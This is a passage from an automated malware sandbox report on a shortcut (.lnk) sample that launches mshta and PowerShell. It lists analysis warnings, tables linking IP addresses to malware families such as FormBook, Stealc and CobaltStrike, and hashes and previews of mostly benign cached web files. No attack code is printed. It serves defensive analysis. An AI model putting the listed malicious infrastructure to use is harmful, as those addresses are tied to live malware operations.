                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                          • Number of executed functions: 6
                                                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                          • Found application associated with file extension: .lnk

                                                                                                                                                                                          Warnings

                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                          • Execution Graph export aborted for target mshta.exe, PID 7508 because it is empty
                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7404 because it is empty
                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                          • VT rate limit hit for: T15hf0Y3mp.lnk

                                                                                                                                                                                          Simulations

                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                          02:35:01API Interceptor8x Sleep call for process: powershell.exe modified
                                                                                                                                                                                          02:35:19API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                          02:35:19API Interceptor1x Sleep call for process: mshta.exe modified

                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                          IPs

                                                                                                                                                                                          No context

                                                                                                                                                                                          Domains

                                                                                                                                                                                          No context

                                                                                                                                                                                          ASNs

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          UKRAINE-ASUAMglAEOjknh.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                                          • 185.233.45.122
                                                                                                                                                                                          request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                          • 185.68.16.94
                                                                                                                                                                                          NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.68.16.94
                                                                                                                                                                                          custom_clearance_notification_20240918.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                          • 91.222.136.87
                                                                                                                                                                                          PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                          • 185.68.16.133
                                                                                                                                                                                          NEW ORDERS scan_29012019.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                          • 185.68.16.133
                                                                                                                                                                                          New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                          • 185.68.16.133
                                                                                                                                                                                          myfile.exeGet hashmaliciousSodinokibi, Chaos, Netwalker, Revil, TrojanRansomBrowse
                                                                                                                                                                                          • 185.68.16.21
                                                                                                                                                                                          z1DOCUMENTINV.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                          • 91.222.136.87
                                                                                                                                                                                          http://e1.eslenglish-hk.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.104.45.106

                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19t4GNf3V8mp.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                          • 185.68.16.189
                                                                                                                                                                                          JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                          • 185.68.16.189
                                                                                                                                                                                          GK059kPZ5B.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                          • 185.68.16.189
                                                                                                                                                                                          TP77MvSzt2.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                          • 185.68.16.189
                                                                                                                                                                                          jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                          • 185.68.16.189
                                                                                                                                                                                          ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                          • 185.68.16.189
                                                                                                                                                                                          w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                          • 185.68.16.189
                                                                                                                                                                                          jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                          • 185.68.16.189
                                                                                                                                                                                          1GeaC4QnFy.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                          • 185.68.16.189
                                                                                                                                                                                          OyPpyRRqd8.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                          • 185.68.16.189

                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                          No context

                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                          Entropy (8bit):1.3073815861127318
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrU:KooCEYhgYEL0In
                                                                                                                                                                                          MD5:7AF2A5C7445926D05EC1A001EB73F128
                                                                                                                                                                                          SHA1:246EF56257321726C9C41AD0A2D39DC69E7E12AE
                                                                                                                                                                                          SHA-256:63D51BB8AB4526A0F3FB7634FA995350D476FDC6EF6439FFB181AB5556BC3BE1
                                                                                                                                                                                          SHA-512:E57AECB0AACC189C4247DD444942CE0514D1A8B684F43C55331FB4B0902EF88F59E905C1331627538552DC3B4DAC652489EC2079CBE86621D3E05F1AF30E6154
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfd7f282c, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                          Entropy (8bit):0.4221665541615698
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                                                                                                                                          MD5:B7BB726DD284C5BBDE0BBE33B4575122
                                                                                                                                                                                          SHA1:7702C49F0CEEC2BEADBBDA2060F6CEF0202959FF
                                                                                                                                                                                          SHA-256:518C11EA455C4A98FAA8DA7884A227B8D3B6ADAEEDB627895B1B602062B6FC9A
                                                                                                                                                                                          SHA-512:CF37C225FFB7666B70AD6776D3C4D1018255B59314073085BECCEFEF3C3C04BD6AC5A2C89C7EFBCB3EDD9F510EAA8BB47BDA42032CFF308CAFF209B5064FA6CC
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:..(,... .......A.......X\...;...{......................0.!..........{A..#...|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................N.#...|..................5i.l.#...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                          Entropy (8bit):0.0766415877866752
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:2/8YeBhmWjn13a/PX1allcVO/lnlZMxZNQl:2UzBhmW53qfQOewk
                                                                                                                                                                                          MD5:99B76EF935912924759C72E9A7053184
                                                                                                                                                                                          SHA1:119455A0E427DD58B2F27C3EC1F49B9565E7E7F0
                                                                                                                                                                                          SHA-256:F0AB52A4F6C199D1426A6C967A53E91B57474ADED94195F06B71BE22682F6C56
                                                                                                                                                                                          SHA-512:FCE5CD78DB715C69C3C6877491C7F2F004666B1613708C4449C37FC17F60610F53B7E63120568400C29849AEFB88FB0D8DF547C273D1FD8EDB4CF50DAB651A37
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:.*Jn.....................................;...{...#...|.......{A..............{A......{A..........{A]................5i.l.#...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):49120
                                                                                                                                                                                          Entropy (8bit):0.0017331682157558962
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Ztt:T
                                                                                                                                                                                          MD5:0392ADA071EB68355BED625D8F9695F3
                                                                                                                                                                                          SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                                                                                                                                                                          SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                                                                                                                                                                          SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\awdr_pro[1].js

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1969
                                                                                                                                                                                          Entropy (8bit):4.138257995382343
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:NXRq+M1i64MwMMw4Mojr/FlFAiSRwQsQh9igscgsDiuk:NM+dXMF4RXmiSmQDh9i8iuk
                                                                                                                                                                                          MD5:F4B3CFD8A8AE7BC745695971004BD432
                                                                                                                                                                                          SHA1:56BCC845FADDB4BB24BB4B361FFCE49BB2803977
                                                                                                                                                                                          SHA-256:CE62B634712417BD24F7B23DA37D2EE5A291ED7452EB9E47384D4F15537F03E7
                                                                                                                                                                                          SHA-512:CD3B45C9FDDD09CEA5567E27B6ECF3B855345E7AB57C3CC93374BFCA3765576A91793E1402C99357564D44FC0107D5D75C360FCC110337416904E89D9F5EC748
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:/* global jQuery, ajaxurl, wdr_data */.(function ($) {. $(document).ready(function () {. $(document).on("click", ".awdr_change_product", function() {. var product_id = $(this).attr('data-pid');. var rule_unique_id = $(this).attr('data-rule_id');. var parent_id = $(this).attr('data-parent_id');.. var data = {. action: 'awdr_change_discount_product_in_cart',. product_id: product_id,. rule_unique_id: rule_unique_id,. parent_id: parent_id,. awdr_nonce: awdr_params.nonce,. };. $.ajax({. url: awdr_params.ajaxurl,. data: data,. type: 'POST',. success: function (response) {. if(response.success == true){. if(response.data == 1){. jQuery("[name='update_cart']").removeAttr('disabled');. jQuery(

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\by_onsales[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):57
                                                                                                                                                                                          Entropy (8bit):4.610982286239398
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:lD5Gl0XwHRp8Yn:c/+Yn
                                                                                                                                                                                          MD5:CF3A71F4F059554809A6C493EDAB94B3
                                                                                                                                                                                          SHA1:9E60E866175163112070257AEE5019A825C8A024
                                                                                                                                                                                          SHA-256:46C9EB24D0DF1F5EBCC4885F9B7EEDC7DE9998FD9052116B25A5F0FD2A90BC97
                                                                                                                                                                                          SHA-512:12A055D8E6BC0B359D2A4A572C81A184A96FE3E41914E72E6CEBEFF6B01C11ADF343069438D1F1D6C5014FFE0366ABB2E4F3A57DA243C38A08A1A81EA0CE8E86
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.woof_checkbox_sales_container{. margin-bottom: 4px;.}

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\color[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5745
                                                                                                                                                                                          Entropy (8bit):4.684887323091434
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:3qA9usR1aMd5CUN4+04j30VfaXt2Y5HJGRUU5:asusR1aMdzN4D4jEVfaXth5wRUU5
                                                                                                                                                                                          MD5:42D8E48001FDAA4FEC9FC10645CC211E
                                                                                                                                                                                          SHA1:4E776DA85C2361E333E24A642A96B9766A670B83
                                                                                                                                                                                          SHA-256:F56B11F2C3245EB95100FA1B5A7E8102F6D760353962624F0896C77C66423284
                                                                                                                                                                                          SHA-512:C3415FEE85D2D314EC12ADC3F2ABE6B2411E9FAE06D58C11F06E96DF294B9A959D8DECD575A1B974A708488C5F76AB88E078E5F00795E4F993B10580576D4E1D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview::root {. --woof-sd-ie-clr_width: 60px;. --woof-sd-ie-clr_height: 60px;.. --woof-sd-ie-clr_show_tooltip: none;. --woof-sd-ie-clr_show_tooltip_count: block-inline;... --woof-sd-ie-clr_color: #000000;. --woof-sd-ie-clr_image: url();. --woof-sd-ie-clr_hover_scale: 110;. --woof-sd-ie-clr_selected_scale: 110;.. --woof-sd-ie-clr_border_radius: 50%;. --woof-sd-ie-clr_border_width: 1px;. --woof-sd-ie-clr_hover_border_width: 1px;. --woof-sd-ie-clr_selected_border_width: 1px;. --woof-sd-ie-clr_border_color: #79b8ff;. --woof-sd-ie-clr_hover_border_color: #79b8ff;. --woof-sd-ie-clr_selected_border_color: #79b8ff;. --woof-sd-ie-clr_border_style: solid;. --woof-sd-ie-clr_hover_border_style: dashed;. --woof-sd-ie-clr_selected_border_style: dashed;.. --woof-sd-ie-clr_margin_right: 9px;. --woof-sd-ie-clr_margin_bottom: 11px;.. --woof-sd-ie-clr_transition: 300s;... --woof-sd-ie-clr_counter_show: inline-flex;. --woof-sd-ie-clr_counter_wi

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\error[1]

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3249
                                                                                                                                                                                          Entropy (8bit):5.4598794938059125
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
                                                                                                                                                                                          MD5:939A9FBD880F8B22D4CDD65B7324C6DB
                                                                                                                                                                                          SHA1:62167D495B0993DD0396056B814ABAE415A996EE
                                                                                                                                                                                          SHA-256:156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
                                                                                                                                                                                          SHA-512:91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\front[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):27359
                                                                                                                                                                                          Entropy (8bit):4.926530646016363
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:AF6uFPnk1i5loDPZbMPs+FeF7F3F0KX07FX:AIuFLfEFx47t
                                                                                                                                                                                          MD5:4FE4B3F32BBB6FFA24CCDBCE2BEF4846
                                                                                                                                                                                          SHA1:B46DF4CB68190E0DD021FBE8DD2345848243EB76
                                                                                                                                                                                          SHA-256:D68EBF618DE4CF4A07601E6BB19B82DE52AC59598C88C26AFF7FCD74BB2ECDB0
                                                                                                                                                                                          SHA-512:F9362B00D33F530F3971AC952FC7E0B509CF8102F5B1231DD4BEE2170579C9B1D2562DC044E4EEBA80DB952AE6DEE059D600651EEF64C67CD67B422638924D3B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.woof_container{. padding-bottom: 5px;. margin-bottom: 9px;.}...woof_container select{. width: 100%;.}...woof_container label{. display: inline-block !important;.}..ul.woof_list{. margin: 0 !important;. list-style: none !important;.}..li.woof_list{. list-style: none !important;.}...woof_list li{. list-style: none !important;.}...woof_block_html_items ul{. margin-left: 0 !important;.}...woof_list label{. vertical-align: middle;. padding-top: 4px;. padding-bottom: 4px;. display: inline-block !important;.}...woof_childs_list{. padding: 0 0 0 17px !important;. margin: 0 !important;.}../**********************/..woof_auto_show{. position: absolute;. z-index: 1001;. width: 100%;.}...woof_sid_auto_shortcode .woof_container{. width: 33%;. min-width: 150px;.}...woof_sid_auto_shortcode .woof_container,..woof_sid_auto_shortcode .woof_container_mselect{. overflow-x: hidden;. overflow-y: auto;. min-height: fit-content;. max-heig

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\select_radio_check[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3138
                                                                                                                                                                                          Entropy (8bit):4.845003631518894
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:30503s0jRBnKwGvhazIscTBdTz1YrpTVJnqF5ZBkJUvrNJ6TN8LU:k503s0jvKNpaBcT3arpDqF5Zqco6LU
                                                                                                                                                                                          MD5:F821E43916EBD30DB5D2B3AE8972DDE6
                                                                                                                                                                                          SHA1:78C66310A2501EE5F163200B6A23CC6233E33A93
                                                                                                                                                                                          SHA-256:3627B01B44AD8B0E399F94E27359DB86E430B5F758E4550BD1004F442F81106F
                                                                                                                                                                                          SHA-512:B8A5737041769885BB69089199491A2641A17ED3C717682E1DCA5D32FB45020F73019882D68D949828959E7D3C6AE4281B0F80605BC949F4E3DEF98C7383B155
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:/* http://codepen.io/elmahdim/pen/hlmri */.dl.woof_select_radio_check{. margin: 0 !important;.}....woof_select_radio_check dd,..woof_select_radio_check dt {. margin: 0px;. padding: 0px;.}...woof_select_radio_check ul {. margin: -1px 0 0 0;.}...woof_select_radio_check dd {. position: relative;.}...woof_select_radio_check a,..woof_select_radio_check a:visited {. color: #839b05;. text-decoration: none;. outline: none;. font-size: 12px;.}...woof_select_radio_check dt a {. background-color: #fff;. color: #424035 !important;. display: block;. padding: 5px 15px 5px 7px;. line-height: 18px;. overflow: hidden;. border: solid 1px #eee;. border-radius: 2px;.}...woof_select_radio_check dt.woof_select_radio_check_opened a {. background-color: #477bff;. color: #fff !important;. border: solid 1px #fff;.}...woof_multiSel{. margin-bottom: 0 !important;.}...woof_select_radio_check dt a span,..woof_multiSel span {. cursor: pointer;. dis

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\site_main[1].js

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):9679
                                                                                                                                                                                          Entropy (8bit):3.5740520228025834
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:BFRQoECFMGECL2l6okilou4hGkipOCNdOSvoedcZfwLIAD2Viey2:KovMGC6ovB4hGnjcS2x
                                                                                                                                                                                          MD5:7237A842DF6FF90E7D924E9493D49796
                                                                                                                                                                                          SHA1:2B5FF1EC857FEF073ADC6D370C467CE5B1ABFA25
                                                                                                                                                                                          SHA-256:9D58BE93D455EB9E641052F86B28D51A1C47C3283679FD12E5EC457CF2F40161
                                                                                                                                                                                          SHA-512:D7AB351519B55E5788A60A96AF0605EC60D81DCF0506B2187611773AB3696997E8F5754CE6FB2DA2784C5A9712FF00F30804FD7C035916158A51DE52DCA8B283
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:(function ($) {. /**. * refresh cart when payment method changed. */. if (awdr_params.refresh_order_review == '1') {. $(document).on('change', 'input[name="payment_method"],input[name="billing_city"],input[name="billing_postcode"]', function () {. refreshCart();. });.. /**. * refresh cart when Email changed. */. $(document).on('blur', 'input[name="billing_email"], select#billing_state', function () {. refreshCart();. });. }.. function refreshCart() {. $('body').trigger('update_checkout');. }.. $(document).ready(function ($) {. function init_events() {. if (awdr_params.enable_update_price_with_qty == 'show_dynamically') {. $(document).on('change', '[name="quantity"]', function (){. var awdr_qty_object = $(this);. setTimeout(function(){. var $qty = awdr_qty_object.val();.

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\switcher[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4289
                                                                                                                                                                                          Entropy (8bit):4.919735429341782
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:mptBqnBQDHR3/9GmQrtgc18cDvYQmltSuJWyW51V:ceBERv9jQuc18VQmmua51V
                                                                                                                                                                                          MD5:1EBDDED2CCEB731FD3C112FD866A4A1C
                                                                                                                                                                                          SHA1:EABA5B3711A25AA78D79413D9E6EC915487FCE4A
                                                                                                                                                                                          SHA-256:5A5F1B12C22B8E6462AE9822CBD42E2640F4E8ED8B9382DB6BFFA1C876DA347B
                                                                                                                                                                                          SHA-512:888386F361F37B730B74EEC6E3360C3773BA9D8101C0BA3FAFA2B071565BF559C38A0BBB0C3A7073C62DB9ACFA80EEDC79E3D41B117A8BFA7EF58D8C2237E469
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview::root {.. --woof-sd-ie-vertex_enabled_bg_color: #79b8ff;.. --woof-sd-ie-substrate_enabled_bg_color: #c8e1ff;.. --woof-sd-ie-vertex_disabled_bg_color: #ffffff;.. --woof-sd-ie-substrate_disabled_bg_color: #9a9999;.. --woof-sd-ie-vertex_size: 20px;.. --woof-sd-ie-vertex_border_radius: 50%;.. --woof-sd-ie-vertex_top: 0;.. --woof-sd-ie-substrate_width: 34px;.. --woof-sd-ie-substrate_height: 14px;.. --woof-sd-ie-substrate_border_radius: 8px;.. --woof-sd-ie-label_font_color: #333333;.. --woof-sd-ie-label_font_size: 16px;.. --woof-sd-ie-label_left: 15px;.. --woof-sd-ie-label_top: -18px;..}....label.switcher23-toggle {.. position: relative;.. display: inline-block;.. width: auto;.. height: auto;.. cursor: pointer;.. -webkit-tap-highlight-color: transparent;.. transform: translate3d(0, 0, 0);.. padding: 0 !important;..}...switcher23-toggle:before {.. content: "";.. position: relative;.. top: 3px;.. left: 3px;.. widt

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\awdr-dynamic-price[1].js

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3053
                                                                                                                                                                                          Entropy (8bit):3.887265636358029
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:P/M8xKhcYZkrMgtpRkMMtMbpbM3PMVsnYtE8rY8Wysl+y2:P/jxKhcYSr1pRIUpbSP3YtzrY8WyVy2
                                                                                                                                                                                          MD5:0624A076A8B15D2D238FB31043BED59C
                                                                                                                                                                                          SHA1:A1F9ADBCB37555B3ADB1F59666CE22DB51658382
                                                                                                                                                                                          SHA-256:CB8528F82C58653AB48A3C62C296C0E5B8483AB9D53A435D1372D401FD2A63D0
                                                                                                                                                                                          SHA-512:CB7FA810802EBD7BF47EAA3CFC464F9793AAFE3767C662D2C211C9A12ED99F078090919D88F2BC0B17F56B237390D176A2621D408FBA2893C246AF2BECA12EB2
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:(function ($) {. $.extend({. AdvanceWooDiscountRules: {. form: null,. product_id: null,. quantity: 0,. options: [],. target: null,. getDynamicDiscountPriceFromCartForm: function($form, $target, $options){. if (typeof $options !== 'undefined') {. this.options = $options;. }. if (typeof $target !== 'undefined') {. this.target = $target;. }. if (typeof $form !== 'undefined' && $form.is('form')) {. this.form = $form;. } else {. this.logError("Incorrect form provided");. }. this.product_id = this.getProductIdFromForm();.. this.quantity = this.getProductQuantityFromForm();. this.getDiscountPriceForProduct();. },. getDiscountPriceForProduct: function () {. if(

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\classic-themes.min[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):217
                                                                                                                                                                                          Entropy (8bit):5.1508709451178865
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:UhC6j/7NKZTRYrtH3ERAT8wEggqgq/wl/q:Uz77NdG4Cqcl/q
                                                                                                                                                                                          MD5:95E891F28E44A9B314C09545D86BE2B7
                                                                                                                                                                                          SHA1:F9B13A8BD47273B086A0A07DF15F314E0AF0BC3E
                                                                                                                                                                                          SHA-256:5A5F39391FBF5B06DB84B8F9716D53DE575EE97A627D2C5F12F79A991A671EB5
                                                                                                                                                                                          SHA-512:105947A192EC19166AB0D106A357BAC3C4DF7FCF575E4BEFA3002F0F032F80056CABF3AF085DE1F27B177243F7053D624059C7389E90259B9A62D745CBC19289
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:/*! This file is auto-generated */..wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\error[1]

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
